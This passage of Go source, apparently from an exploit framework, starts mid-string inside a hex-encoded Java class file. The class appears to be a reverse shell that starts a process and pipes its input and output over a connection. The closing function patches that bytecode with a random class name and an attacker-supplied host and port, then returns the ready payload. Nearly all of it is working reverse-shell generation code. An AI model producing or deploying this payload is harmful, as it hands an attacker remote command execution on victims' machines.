		"\x72\x74\x79\x01\x00\x07\x69\x6e" +
		"\x64\x65\x78\x4f\x66\x01\x00\x15" +
		"\x28\x4c\x6a\x61\x76\x61\x2f\x6c" +
		"\x61\x6e\x67\x2f\x53\x74\x72\x69" +
		"\x6e\x67\x3b\x29\x49\x01\x00\x16" +
		"\x28\x5b\x4c\x6a\x61\x76\x61\x2f" +
		"\x6c\x61\x6e\x67\x2f\x53\x74\x72" +
		"\x69\x6e\x67\x3b\x29\x56\x01\x00" +
		"\x13\x72\x65\x64\x69\x72\x65\x63" +
		"\x74\x45\x72\x72\x6f\x72\x53\x74" +
		"\x72\x65\x61\x6d\x01\x00\x1d\x28" +
		"\x5a\x29\x4c\x6a\x61\x76\x61\x2f" +
		"\x6c\x61\x6e\x67\x2f\x50\x72\x6f" +
		"\x63\x65\x73\x73\x42\x75\x69\x6c" +
		"\x64\x65\x72\x3b\x01\x00\x05\x73" +
		"\x74\x61\x72\x74\x01\x00\x15\x28" +
		"\x29\x4c\x6a\x61\x76\x61\x2f\x6c" +
		"\x61\x6e\x67\x2f\x50\x72\x6f\x63" +
		"\x65\x73\x73\x3b\x01\x00\x11\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
		"\x2f\x49\x6e\x74\x65\x67\x65\x72" +
		"\x01\x00\x08\x70\x61\x72\x73\x65" +
		"\x49\x6e\x74\x01\x00\x16\x28\x4c" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
		"\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x3b\x49\x29\x56\x01\x00\x0e\x67" +
		"\x65\x74\x49\x6e\x70\x75\x74\x53" +
		"\x74\x72\x65\x61\x6d\x01\x00\x17" +
		"\x28\x29\x4c\x6a\x61\x76\x61\x2f" +
		"\x69\x6f\x2f\x49\x6e\x70\x75\x74" +
		"\x53\x74\x72\x65\x61\x6d\x3b\x01" +
		"\x00\x18\x28\x4c\x6a\x61\x76\x61" +
		"\x2f\x69\x6f\x2f\x49\x6e\x70\x75" +
		"\x74\x53\x74\x72\x65\x61\x6d\x3b" +
		"\x29\x56\x01\x00\x13\x28\x4c\x6a" +
		"\x61\x76\x61\x2f\x69\x6f\x2f\x52" +
		"\x65\x61\x64\x65\x72\x3b\x29\x56" +
		"\x01\x00\x0f\x67\x65\x74\x4f\x75" +
		"\x74\x70\x75\x74\x53\x74\x72\x65" +
		"\x61\x6d\x01\x00\x18\x28\x29\x4c" +
		"\x6a\x61\x76\x61\x2f\x69\x6f\x2f" +
		"\x4f\x75\x74\x70\x75\x74\x53\x74" +
		"\x72\x65\x61\x6d\x3b\x01\x00\x19" +
		"\x28\x4c\x6a\x61\x76\x61\x2f\x69" +
		"\x6f\x2f\x4f\x75\x74\x70\x75\x74" +
		"\x53\x74\x72\x65\x61\x6d\x3b\x29" +
		"\x56\x01\x00\x13\x28\x4c\x6a\x61" +
		"\x76\x61\x2f\x69\x6f\x2f\x57\x72" +
		"\x69\x74\x65\x72\x3b\x29\x56\x01" +
		"\x00\x08\x69\x73\x43\x6c\x6f\x73" +
		"\x65\x64\x01\x00\x03\x28\x29\x5a" +
		"\x01\x00\x08\x72\x65\x61\x64\x4c" +
		"\x69\x6e\x65\x01\x00\x06\x61\x70" +
		"\x70\x65\x6e\x64\x01\x00\x2d\x28" +
		"\x4c\x6a\x61\x76\x61\x2f\x6c\x61" +
		"\x6e\x67\x2f\x53\x74\x72\x69\x6e" +
		"\x67\x3b\x29\x4c\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x53\x74" +
		"\x72\x69\x6e\x67\x42\x75\x69\x6c" +
		"\x64\x65\x72\x3b\x01\x00\x08\x74" +
		"\x6f\x53\x74\x72\x69\x6e\x67\x01" +
		"\x00\x05\x77\x72\x69\x74\x65\x01" +
		"\x00\x15\x28\x4c\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x53\x74" +
		"\x72\x69\x6e\x67\x3b\x29\x56\x01" +
		"\x00\x05\x66\x6c\x75\x73\x68\x01" +
		"\x00\x10\x6a\x61\x76\x61\x2f\x6c" +
		"\x61\x6e\x67\x2f\x54\x68\x72\x65" +
		"\x61\x64\x01\x00\x05\x73\x6c\x65" +
		"\x65\x70\x01\x00\x04\x28\x4a\x29" +
		"\x56\x01\x00\x05\x72\x65\x61\x64" +
		"\x79\x01\x00\x04\x72\x65\x61\x64" +
		"\x01\x00\x03\x28\x29\x49\x01\x00" +
		"\x04\x28\x49\x29\x56\x01\x00\x09" +
		"\x65\x78\x69\x74\x56\x61\x6c\x75" +
		"\x65\x01\x00\x07\x64\x65\x73\x74" +
		"\x72\x6f\x79\x01\x00\x05\x63\x6c" +
		"\x6f\x73\x65\x00\x21\x00\x0e\x00" +
		"\x32\x00\x01\x00\x33\x00\x02\x00" +
		"\x18\x00\x34\x00\x35\x00\x01\x00" +
		"\x36\x00\x00\x00\x02\x00\x0f\x00" +
		"\x18\x00\x37\x00\x35\x00\x01\x00" +
		"\x36\x00\x00\x00\x02\x00\x10\x00" +
		"\x0d\x00\x01\x00\x38\x00\x39\x00" +
		"\x01\x00\x3a\x00\x00\x01\xeb\x00" +
		"\x06\x00\x0b\x00\x00\x01\x03\x2a" +
		"\xb7\x00\x01\x12\x02\x4c\x12\x03" +
		"\xb8\x00\x04\x12\x05\xb6\x00\x06" +
		"\x02\x9f\x00\x06\x12\x07\x4c\xbb" +
		"\x00\x08\x59\x04\xbd\x00\x09\x59" +
		"\x03\x2b\x53\xb7\x00\x0a\x04\xb6" +
		"\x00\x0b\xb6\x00\x0c\x4d\xbb\x00" +
		"\x0d\x59\x12\x0f\x12\x10\xb8\x00" +
		"\x11\xb7\x00\x12\x4e\xbb\x00\x13" +
		"\x59\xbb\x00\x14\x59\x2d\xb6\x00" +
		"\x15\xb7\x00\x16\xb7\x00\x17\x3a" +
		"\x04\xbb\x00\x18\x59\xbb\x00\x19" +
		"\x59\x2d\xb6\x00\x1a\xb7\x00\x1b" +
		"\xb7\x00\x1c\x3a\x05\xbb\x00\x18" +
		"\x59\xbb\x00\x19\x59\x2c\xb6\x00" +
		"\x1d\xb7\x00\x1b\xb7\x00\x1c\x3a" +
		"\x06\xbb\x00\x13\x59\xbb\x00\x14" +
		"\x59\x2c\xb6\x00\x1e\xb7\x00\x16" +
		"\xb7\x00\x17\x3a\x07\x2d\xb6\x00" +
		"\x1f\x9a\x00\x64\x19\x04\xb6\x00" +
		"\x20\x59\x3a\x08\xc6\x00\x21\x19" +
		"\x06\xbb\x00\x21\x59\xb7\x00\x22" +
		"\x19\x08\xb6\x00\x23\x12\x24\xb6" +
		"\x00\x23\xb6\x00\x25\xb6\x00\x26" +
		"\x19\x06\xb6\x00\x27\x14\x00\x28" +
		"\xb8\x00\x2a\x03\x36\x09\x19\x07" +
		"\xb6\x00\x2b\x99\x00\x18\x19\x07" +
		"\xb6\x00\x2c\x59\x36\x09\x9e\x00" +
		"\x0d\x19\x05\x15\x09\xb6\x00\x2d" +
		"\xa7\xff\xe6\x19\x05\xb6\x00\x27" +
		"\x2c\xb6\x00\x2e\x57\xa7\x00\x08" +
		"\x3a\x0a\xa7\xff\x9b\x2c\xb6\x00" +
		"\x30\x2d\xb6\x00\x31\xa7\x00\x04" +
		"\x4c\xb1\x00\x02\x00\xe9\x00\xee" +
		"\x00\xf1\x00\x2f\x00\x04\x00\xfe" +
		"\x01\x01\x00\x2f\x00\x02\x00\x3b" +
		"\x00\x00\x00\x72\x00\x1c\x00\x00" +
		"\x00\x12\x00\x04\x00\x14\x00\x07" +
		"\x00\x15\x00\x15\x00\x16\x00\x18" +
		"\x00\x19\x00\x2f\x00\x1a\x00\x3e" +
		"\x00\x1b\x00\x52\x00\x1c\x00\x66" +
		"\x00\x1d\x00\x7a\x00\x1e\x00\x8e" +
		"\x00\x20\x00\x95\x00\x22\x00\xa0" +
		"\x00\x23\x00\xb9\x00\x24\x00\xbe" +
		"\x00\x26\x00\xc4\x00\x28\x00\xc7" +
		"\x00\x29\x00\xda\x00\x2a\x00\xe4" +
		"\x00\x2c\x00\xe9\x00\x2e\x00\xee" +
		"\x00\x2f\x00\xf1\x00\x30\x00\xf3" +
		"\x00\x32\x00\xf6\x00\x34\x00\xfa" +
		"\x00\x35\x00\xfe\x00\x37\x01\x01" +
		"\x00\x36\x01\x02\x00\x38\x00\x3c" +
		"\x00\x00\x00\x4e\x00\x09\xff\x00" +
		"\x18\x00\x02\x07\x00\x0e\x07\x00" +
		"\x09\x00\x00\xff\x00\x75\x00\x08" +
		"\x07\x00\x0e\x07\x00\x09\x07\x00" +
		"\x3d\x07\x00\x0d\x07\x00\x13\x07" +
		"\x00\x18\x07\x00\x18\x07\x00\x13" +
		"\x00\x00\xfc\x00\x2f\x07\x00\x09" +
		"\xfc\x00\x08\x01\x1c\x4c\x07\x00" +
		"\x2f\xf9\x00\x04\xff\x00\x0a\x00" +
		"\x01\x07\x00\x0e\x00\x01\x07\x00" +
		"\x2f\x00\x00\x01\x00\x3e\x00\x3f" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x3b\x00\x01\x00\x40\x00\x3f" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x40\x00\x01\x00\x41\x00\x42" +
		"\x00\x02\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x45\x00\x43\x00\x00\x00\x02" +
		"\x00\x44\x00\x01\x00\x45\x00\x42" +
		"\x00\x02\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x4a\x00\x43\x00\x00\x00\x02" +
		"\x00\x44\x00\x01\x00\x46\x00\x42" +
		"\x00\x02\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x4f\x00\x43\x00\x00\x00\x02" +
		"\x00\x44\x00\x01\x00\x47\x00\x3f" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x54\x00\x01\x00\x48\x00\x3f" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x59\x00\x01\x00\x49\x00\x4a" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x02\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x5e\x00\x81\x00\x4b\x00\x4c" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x04\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x63\x00\x01\x00\x4d\x00\x4e" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x02\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x68\x00\x81\x00\x4f\x00\x50" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x02\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x6d\x00\x01\x00\x51\x00\x52" +
		"\x00\x01\x00\x3a\x00\x00\x00\x1a" +
		"\x00\x01\x00\x01\x00\x00\x00\x02" +
		"\x01\xb0\x00\x00\x00\x01\x00\x3b" +
		"\x00\x00\x00\x06\x00\x01\x00\x00" +
		"\x00\x72\x00\x01\x00\x53\x00\x00" +
		"\x00\x02\x00\x54"

	classSize := make([]byte, 2)
	classString := transform.Title(random.RandLettersRange(8, 17))
	binary.BigEndian.PutUint16(classSize, uint16(len(classString)))

	ipSize := make([]byte, 2)
	binary.BigEndian.PutUint16(ipSize, uint16(len(conf.Lhost)))

	portSize := make([]byte, 2)
	portString := strconv.Itoa(conf.Lport)
	binary.BigEndian.PutUint16(portSize, uint16(len(portString)))

	reverseShell = strings.ReplaceAll(reverseShell, "\x00\x07Reverse", string(classSize)+classString)
	reverseShell = strings.ReplaceAll(reverseShell, "\x00\x08AAAAAAAA", string(ipSize)+conf.Lhost)
	reverseShell = strings.ReplaceAll(reverseShell, "\x00\x08BBBBBBBB", string(portSize)+portString)

	return reverseShell, classString
}
